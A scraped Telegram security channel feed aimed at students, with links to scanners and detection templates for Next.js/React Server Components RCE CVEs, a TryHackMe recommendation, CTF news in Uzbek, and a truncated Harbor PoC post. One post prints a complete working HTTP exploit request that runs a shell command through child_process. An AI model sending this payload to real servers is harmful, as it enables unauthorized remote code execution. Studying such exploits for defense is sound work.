SecList for CyberStudents

React2Shell Ultimate - The most comprehensive CVE-2025-66478 Scanner for Next.js RSC RCE vulnerability. Multi-mode detection, WAF bypass, local scanning.

https://github.com/hackersatyamrastogi/react2shell-ultimate

🔥1

87 views08:41

SecList for CyberStudents

https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3#file-cve-2025-55182-http

There is Active Detection Template for CVE-2025-55182. You can find this vuln with your Nuclei. For this you must add .yaml POC for your Nuclei !

Gist

CVE-2025-55182 React Server Components RCE POC

CVE-2025-55182 React Server Components RCE POC. GitHub Gist: instantly share code, notes, and snippets.

87 viewsedited 12:00

SecList for CyberStudents

POC:

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 744

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('whoami',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

85 viewsedited 12:05

SecList for CyberStudents

In the field of cybersecurity, it is essential to continuously study publicly available exploits or vulnerabilities discovered in certain technologies. You can learn how to use the latest emerging exploits through the "recent-threats" module available on TryHackMe at https://tryhackme.com/module/recent-threats . I hope this will be useful for you!

#tryhackme #pentest #cybersecurity #CVE

102 viewsedited 12:30

SecList for CyberStudents

Forwarded from Turan Security

0:16

This media is not supported in your browser

VIEW IN TELEGRAM

🏆 BlackHat MEA 2025 CTF musobaqasida 12-o'rin!

☠️Turan Security va 🇺🇿O'zbekiston sharafini himoya qilgan jamoa dunyoning eng nufuzli kiberxavfsizlik musobaqalaridan birida 125 jamoa orasidan TOP-12 talikdan joy oldi!

Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.

TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:

🚩Firstblood - web, birinchi;
🚩Firstblood - forensics, birinchi;
🚩Secondblood - web, ikkinchi bo'lib flagni aniqlashga erishdi.

Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirishga hissa qo’shish.

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥3👍2❤1

95 views17:47

SecList for CyberStudents

123 views08:39

SecList for CyberStudents

Forwarded from Private Shizo

CVE-2022-46463.zip

2.9 KB

💥PoC for CVE-2022-46463
An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication.

Usage: